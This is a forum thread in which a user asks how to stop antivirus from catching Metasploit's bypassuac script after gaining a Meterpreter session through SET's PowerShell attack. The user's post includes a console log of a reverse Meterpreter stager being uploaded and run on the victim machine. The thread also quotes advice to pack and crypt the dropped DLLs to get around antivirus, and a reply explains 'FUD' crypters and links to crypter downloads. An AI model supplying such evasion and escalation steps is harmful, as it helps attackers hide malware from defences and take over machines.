Jump to content

bypassuac caught by my antivirus


SystemCrash86
 Share

Recommended Posts

I was using SET and I can get a meterpreter session easy on my Desktop running windows 7 with up-to-date Microsoft Security Essentials thanks to the new and improved multi powershell attack on multiple port.


When I go to the cloned webpage I get the java applet like normal and I am not notified by my antivirus that there is a problem. Great.

If I understand correctly it goes straight into memory never touching disk right?


Now once I have a meterpreter session the next thing I try to do is escalate my privileges and running “get system” does not work so I use the script that Dave Kennedy and Kevin Mitnick made to bypass uac, but whenever I do it is automatically caught by my antivirus.

How is it possible to get this to work? I already have a meterpreter session.


I try to search on Google for an answer and all I get is videos of bypassuac tutorials - all of which work flawlessly so I cant explain why my antivirus catches it when I can get a meterpreter session.


When getting a meterpreter and running bypassuac this is what I get as my desktop pc Microsoft security essentials detects it:


msf exploit(handler) > sessions -i 2

[*] Starting interaction with 2...

meterpreter > getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied.

meterpreter > run bypassuac

[*] Creating a reverse meterpreter stager: LHOST=192.168.1.71 LPORT=4546
[*] Running payload handler

[*] Uploading Windows UACBypass to victim machine.

[*] Bypassing UAC Restrictions on the system....

[*] Meterpreter stager executable 73802 bytes long

[*] Uploaded the agent to the filesystem....

[*] Executing the agent with endpoint 192.168.1.71:4546 with UACBypass in effect...

[*] C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe /c %TEMP%\FJElQacDvdzS.exe

meterpreter > use post/windows/escalate/bypassuac

Loading extension post/windows/escalate/bypassuac...

[-] Failed to load extension: No such file or directory -/opt/metasploit/msf3/data/meterpreter/ext_server_post/windows/escalate/bypassuac.dll

meterpreter >


I emailed Dave Kennedy and this is what he told me I have to do:

You need to obfuscate the executables that it drops. They are in the Metasploit repositories and are dll's. Just need to randomize / pack / crypt them to get around AV..”


However I am not sure what files he means, I have tried looking but so far I have been unable to locate them. Dave says I should be looking for dll’s in the metasploit repositories but I looked but cant find them or even sure if they are the right ones.

I am using Backtrack 5r3. (Not yet made the switch to Kali yet)


I am very confused and I am hoping that you guys could take the time to help me. All help is greatly appreciated.


Since Dave is a very busy man working extremely hard I wouldn’t want to waste his time that’s why I am posting this on the forums to see if anyone can help.

Link to comment
Share on other sites

He means you need to make the applications FUD (Fully Undetectable) by Crypting it. Usually this means creating a self expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, other don't work. Here is an example:

http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html

There's also a guide on how to build them yourself here:

http://www.cryptersource.com/

Edited by ApacheTech Consultancy
Link to comment
Share on other sites

He means you need to make the applications FUD (Fully Undetectable) by Crypting it. Usually this means creating a self expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, other don't work. Here is an example:

http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html

There's also a guide on how to build them yourself here:

http://www.cryptersource.com/

Oh no i fully understand that, i know exactly how to crypt applications as i've done that before. What i mean was where are the files he was referring to that i need to crypt in order for meterpreters bypassuac script to bypass antivirus or did he want me to actually crypt the bypassuac script itself?

I get a meterpreter session but when using bypassuac to escalate my privilages the bypassuac script keeps getting detected by my antivirus

Edited by SystemCrash86
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...